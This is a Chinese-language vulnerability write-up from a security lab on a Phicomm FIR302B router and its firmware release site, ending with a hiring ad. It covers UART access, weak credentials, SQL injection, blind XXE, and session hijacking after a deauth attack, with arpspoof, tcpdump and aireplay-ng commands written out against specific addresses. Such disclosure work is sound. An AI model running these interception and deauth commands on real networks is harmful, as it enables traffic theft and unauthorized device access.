0×00 固件发布站弱口令+sql注入

fir302b的板子还是比较友好的,拆开能直接看到GND TX RX VCC,虽然没有针脚。
我手头只有一块ttl开发板和三根杜邦线,直接连上UART:

1.png

自检结束后,能看到两处post请求,把当前的设备指纹信息、终端账号密码、云账号密码发送到了一个地址

2.png

3.png

这个url是一个固件发布站,后台存在弱口令

4.png

在查询工号处存在注入

5.png

昨天测试的时候,发现还有个spring框架的任意文件读取漏洞,今天已经修了

0×01 固件发布站SOAP-based blind xxe

抓路由器的数据包看一下完整的请求

root@kali:~# nmap -T4 -O 10.8.5.* -vv Nmap scan report for 10.8.5.232 Host is up, received arp-response (-0.076s latency).
All 1000 scanned ports on 10.8.5.232 are filtered because of 1000 no-responses
MAC Address: F0:EB:D0:54:43:E6 (Shanghai Feixun Communication Co.)
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=6.49BETA4%E=4%D=11/14%OT=%CT=%CU=%PV=Y%DS=1%DC=D%G=N%M=F0EBD0%TM=58295455%P=x86_64-pc-linux-gnu)
SEQ(II=I)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)

root@kali:~# traceroute baidu.com traceroute to baidu.com (111.13.101.208), 30 hops max, 60 byte packets 1 10.8.5.1 (10.8.5.1) 10.091 ms 10.522 ms 10.715 ms
root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward root@kali:~# arpspoof -i eth0 -t 10.8.5.1 10.8.5.232 ...
root@kali:~# arpspoof -i eth0 -t 10.8.5.232 10.8.5.1 ...
root@kali:~# tcpdump -i eth0 -w victim.pcap -vv tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
^C905 packets captured 905 packets received by filter 0 packets dropped by kernel 

这里是因为用的交换机,直接混杂模式抓不到包

那么扫上层网段得到路由器IP,然后找到网关,双向欺骗后,重启路由器,tcpdump抓包,等待路由器自检结束

10.png

wireshark过滤http请求得到完整数据包

发现能自定义DTD,能加载外部实体:

11.png

那么 读一下/var/log/messages

12.png

0×02 认证会话劫持漏洞

说起来这算是为了防御arp嗅探泄露cookie而产生的一种漏洞
简单的测试了一下,deauth中断client连接后,session没有立即失效,伪造client mac地址即可进入路由器

6.png

root@kali:~# airmon-ng check kill Killing these processes: PID Name 1222 wpa_supplicant

root@kali:~# ifconfig  lo        Link encap:Local Loopback  
          inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:12 errors:0 dropped:0 overruns:0 frame:0 TX packets:12 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:720 (720.0 B)  TX bytes:720 (720.0 B)

root@kali:~# airmon-ng start wlan0 PHY    Interface    Driver        Chipset

phy0 wlan0 iwlwifi        Intel Corporation Centrino Ultimate-N 6300 (rev 3e)

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
        (mac80211 station mode vif disabled for [phy0]wlan0)

root@kali:~# airodump-ng wlan0mon -w picTemp/wifi.csv CH 1 ][ Elapsed: 12 s ][ 2016-11-03 14:37 BSSID              PWR  Beacons #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID F0:EB:D0:54:43:E7 -18 9 2 0 11 54e  WPA2 CCMP   PSK  PHICOMM_5443E7 3C:8C:40:49:3D:90 -29 3 3 0 1 54e. OPN              mxxz-chinaunicom B0:68:B6:F8:A6:18 -30 14 0 0 8 54e. WPA2 CCMP   PSK  moresecret D4:EE:07:2B:BE:02 -48 24 3 0 9 54e  WPA2 CCMP   PSK  moresec 22:C0:90:A8:12:83 -45 23 0 0 6 54e. WPA2 CCMP   PSK  LieBaoWiFi355

root@kali:~# airodump-ng wlan0mon --bssid F0:EB:D0:54:43:E7 -c 11 CH 7 ][ Elapsed: 36 s ][ 2016-11-03 14:48 BSSID              PWR  Beacons #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID  F0:EB:D0:54:43:E7 -19 26 3 0 11 54e  WPA2 CCMP   PSK  PHICOMM_5443E7  

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe F0:EB:D0:54:43:E7 30:F7:72:41:91:2B  -38 0 - 1 23 15 root@kali:~# aireplay-ng -0 0 -a F0:EB:D0:54:43:E7 -c 30:F7:72:41:91:2B wlan0mon 15:04:05 Waiting for beacon frame (BSSID: F0:EB:D0:54:43:E7) on channel 11 15:04:06 Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [13|60 ACKs] 15:04:06 Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [25|48 ACKs] 15:04:07 Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [ 0| 0 ACKs] 15:04:07 Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [54| 7 ACKs] 15:04:08  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [56| 0 ACKs] 15:04:09  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [55| 0 ACKs]

7.png

几乎是全站静态,密码base64后硬编码在页面中

8.png

0×03 广告

此外,影武者实验室长期招猥琐的渗透测试,有经验的安全研究员,以及激灵的小鲜肉实习生。有兴趣请联hr@moresec.cn。

*本文作者:影武者实验室